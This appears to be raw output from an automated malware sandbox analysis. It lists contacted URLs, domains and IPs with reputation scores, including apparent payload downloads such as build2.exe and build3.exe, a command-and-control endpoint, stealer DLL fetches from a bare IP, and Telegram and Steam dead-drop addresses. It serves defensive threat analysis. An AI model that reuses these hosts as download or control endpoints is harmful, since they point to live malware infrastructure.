            https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
            https://www.rd.com/list/polite-habits-campers-dislike/0%URL Reputationsafe
            https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
            https://checkout.steampowered.com/0%URL Reputationsafe
            https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b0%URL Reputationsafe
            https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
            https://outlook.com_0%URL Reputationsafe
            https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at0%URL Reputationsafe
            https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl0%URL Reputationsafe
            https://help.steampowered.com/en/0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.amazon.com/0%URL Reputationsafe
            https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=0%URL Reputationsafe
            http://schemas.micro0%URL Reputationsafe
            http://www.twitter.com/0%URL Reputationsafe
            https://recaptcha.net/recaptcha/;0%URL Reputationsafe
            http://www.openssl.org/support/faq.html0%URL Reputationsafe
            https://65.109.242.59/softokn3.dllqd0%Avira URL Cloudsafe
            https://api.2ip.ua/geo.json.100%Avira URL Cloudmalware
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV0%Avira URL Cloudsafe
            https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
            https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
            https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v0%URL Reputationsafe
            https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p0%URL Reputationsafe
            https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi0%URL Reputationsafe
            https://api.2ip.ua/geo.json)0%Avira URL Cloudsafe
            https://65.109.242.59/freebl3.dll5d-0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV0%VirustotalBrowse
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            https://65.109.242.59/freebl3.dll/d0%Avira URL Cloudsafe
            https://api.2ip.ua/geo.json.3%VirustotalBrowse
            https://api.2ip.ua/geo.json)3%VirustotalBrowse
            https://65.109.242.59/Z0%Avira URL Cloudsafe
            https://powerpoint.office.comen0%Avira URL Cloudsafe
            https://65.109.242.59/nss3.dll0%Avira URL Cloudsafe
            http://cajgtus.com/files/1/build3.exe?100%Avira URL Cloudmalware
            https://65.109.242.59/d0%Avira URL Cloudsafe
            https://assets.msn.com/weathermapdata/1/static/finance/crypto/0%Avira URL Cloudsafe
            https://65.109.242.59/f0%Avira URL Cloudsafe
            https://65.109.242.59/j0%Avira URL Cloudsafe
            https://65.109.242.59/i0%Avira URL Cloudsafe
            https://s.ytimg.com;0%Avira URL Cloudsafe
            https://api.2ip.ua/au0%Avira URL Cloudsafe
            https://t.me/copterwin0%Avira URL Cloudsafe
            http://www.reddit.com/0%Avira URL Cloudsafe
            https://65.109.242.59/i0%VirustotalBrowse
            https://65.109.242.59/s0%Avira URL Cloudsafe
            https://65.109.242.59/r0%Avira URL Cloudsafe
            http://cajgtus.com/test1/get.phpenh0%Avira URL Cloudsafe
            https://65.109.242.59/j0%VirustotalBrowse
            https://api.2ip.ua/geo.json-Agent:0%Avira URL Cloudsafe
            https://t.me/copterwin1%VirustotalBrowse
            https://65.109.242.59/:0%Avira URL Cloudsafe
            https://65.109.242.59/d6%VirustotalBrowse
            https://api.2ip.ua/geo.jsonY0%Avira URL Cloudsafe
            https://65.109.242.59/r6%VirustotalBrowse
            http://www.reddit.com/0%VirustotalBrowse
            https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&0%Avira URL Cloudsafe
            https://api.2ip.ua/geo.jsonR0%Avira URL Cloudsafe
            https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://api.2ip.ua/geo.jsonY2%VirustotalBrowse
            https://65.109.242.59/:0%VirustotalBrowse
            https://steamcommunity.com/profiles/76561199689717899(J$-0%Avira URL Cloudsafe
            http://sdfjhuz.com/dl/build2.exe$run0%Avira URL Cloudsafe
            https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&0%VirustotalBrowse
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
            https://65.109.242.59/freebl3.dll0%Avira URL Cloudsafe
            https://65.109.242.59/tography0%Avira URL Cloudsafe
            https://www.google.com/recaptcha/0%Avira URL Cloudsafe
            http://sdfjhuz.com/dl/build2.exe$run3%VirustotalBrowse
            https://steamcommunity.com/profiles/765611996897178990%Avira URL Cloudsafe
            https://api.msn.com:443/v1/news/Feed/Windows?R0%Avira URL Cloudsafe
            https://api.2ip.ua/geo.json-Agent:3%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            safeautomationbd.com
            103.174.152.66
            truetrueunknown
            sdfjhuz.com
            189.163.126.89
            truetrueunknown
            cajgtus.com
            213.172.74.157
            truetrueunknown
            transfer.adttemp.com.br
            104.196.109.209
            truefalseunknown
            steamcommunity.com
            104.102.42.29
            truetrueunknown
            nessotechbd.com
            192.185.16.114
            truetrueunknown
            cdn.discordapp.com
            162.159.134.233
            truetrueunknown
            api.2ip.ua
            188.114.96.3
            truefalseunknown
            trad-einmyus.com
            158.160.165.129
            truetrueunknown
            www.safeautomationbd.com
            unknown
            unknowntrueunknown
            api.msn.com
            unknown
            unknowntrueunknown
            NameMaliciousAntivirus DetectionReputation
            http://trade-inmyus.com/index.phptrue
            • URL Reputation: safe
            unknown
            https://65.109.242.59/nss3.dllfalse
            • Avira URL Cloud: safe
            unknown
            https://65.109.242.59/freebl3.dllfalse
            • Avira URL Cloud: safe
            unknown
            https://steamcommunity.com/profiles/76561199689717899true
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://65.109.242.59/mozglue.dllfalse
            • Avira URL Cloud: safe
            unknown
            https://65.109.242.59/vcruntime140.dllfalse
            • Avira URL Cloud: safe
            unknown
            http://91.92.253.69/wek.exetrue
            • Avira URL Cloud: safe
            unknown
            http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637true
            • Avira URL Cloud: malware
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://duckduckgo.com/chrome_newtabbuild2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://duckduckgo.com/ac/?q=build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://65.109.242.59/softokn3.dllqdbuild2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcVbuild2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1690075566.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://api.2ip.ua/geo.json.E609.exe, 00000011.00000003.2086486753.000000000075E000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000003.2085516872.0000000000765000.00000004.00000020.00020000.00000000.sdmptrue
            • 3%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            https://www.gstatic.cn/recaptcha/build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://65.109.242.59/freebl3.dll5d-build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://api.2ip.ua/geo.json)E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmpfalse
            • 3%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englibuild2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://65.109.242.59/freebl3.dll/dbuild2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://powerpoint.office.comenexplorer.exe, 0000002A.00000003.2707064136.0000000008FE5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2710133432.0000000008FF7000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.valvesoftware.com/legal.htmbuild2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://www.youtube.combuild2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://65.109.242.59/Zbuild2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://cajgtus.com/files/1/build3.exe?E609.exe, 0000000F.00000002.2883282984.00000000030B0000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            unknown
            https://65.109.242.59/dbuild2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
            • 6%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://assets.msn.com/weathermapdata/1/static/finance/crypto/explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackbuild2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://65.109.242.59/fbuild2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://65.109.242.59/jbuild2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://65.109.242.59/ibuild2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://s.ytimg.com;build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://api.2ip.ua/auE609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://t.me/copterwinbuild2.exe, 00000012.00000002.2109889853.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.reddit.com/E609.exe, 0000000F.00000003.2126709109.0000000009840000.00000004.00001000.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://65.109.242.59/sbuild2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://65.109.242.59/rbuild2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
            • 6%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://cajgtus.com/test1/get.phpenhE609.exe, 0000000F.00000002.2877170339.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://api.2ip.ua/geo.json-Agent:E609.exe, 0000001B.00000003.2207878120.0000000000796000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2206427054.0000000000795000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211602242.0000000000796000.00000004.00000020.00020000.00000000.sdmpfalse
            • 3%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1692249717.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://65.109.242.59/:build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://api.2ip.ua/geo.jsonYE609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmpfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://api.2ip.ua/geo.jsonRE609.exe, 00000021.00000003.2274475907.0000000000715000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275857903.0000000000716000.00000004.00000020.00020000.00000000.sdmpfalse
            • 3%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.jsbuild2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://steamcommunity.com/profiles/76561199689717899(J$-build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctabuild2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://65.109.242.59/Ibuild2.exe, 00000013.00000003.2514930235.00000000008A5000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              http://sdfjhuz.com/dl/build2.exe$runE609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmpfalse
              • 3%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.ecosia.org/newtab/build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://lv.queniujq.cnbuild2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.youtube.com/build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngbuild2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://65.109.242.59/tographybuild2.exe, 00000013.00000003.2156939086.0000000000812000.00000004.00000020.00020000.00000000.sdmpfalse
              • 6%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.google.com/recaptcha/build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://api.msn.com:443/v1/news/Feed/Windows?Rexplorer.exe, 0000002A.00000003.2709284810.0000000008F4F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2708310772.0000000008F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2891687444.0000000008E46000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2707064136.0000000008ED6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://checkout.steampowered.com/build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
